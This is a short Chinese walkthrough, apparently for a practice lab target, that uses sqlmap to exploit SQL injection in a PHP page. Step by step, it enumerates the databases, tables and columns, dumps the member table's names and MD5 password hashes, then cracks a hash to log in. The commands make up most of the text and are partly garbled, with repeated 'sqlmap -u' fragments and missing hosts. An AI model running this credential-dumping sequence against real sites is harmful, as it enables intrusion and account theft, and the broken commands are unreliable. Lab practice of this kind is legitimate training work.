实战利用sqlmap渗透

IP地址自行寻找IP地址自行寻找使用工具：sqlmap

直接sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao

检测注入点之后

sqlmap -u sqlmap -u sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao --dbs

查找数据库发现mozhe_discuz_stormgroup数据库即为我们需要的sqlmap -u http://:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup --tables

猜测表名查找到stormgroup_member的表，想必用户信息就在其中sqlmap -u http://:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member --columns

查找字段列名可以很清楚地看到存在name以及password的字段列故sqlmap -u http://IP地址自行寻找:42300/new_list.php?id=tingjigonggao -D mozhe_discuz_stormgroup -T stormgroup_member -C name,password --dump

查看字段随机看到name为mozhepassword为一串MD5加密代码，解密后即为密码使用name和password登录即可

最后说一句这个是找的靶机，别傻乎乎去瞎找网站扫描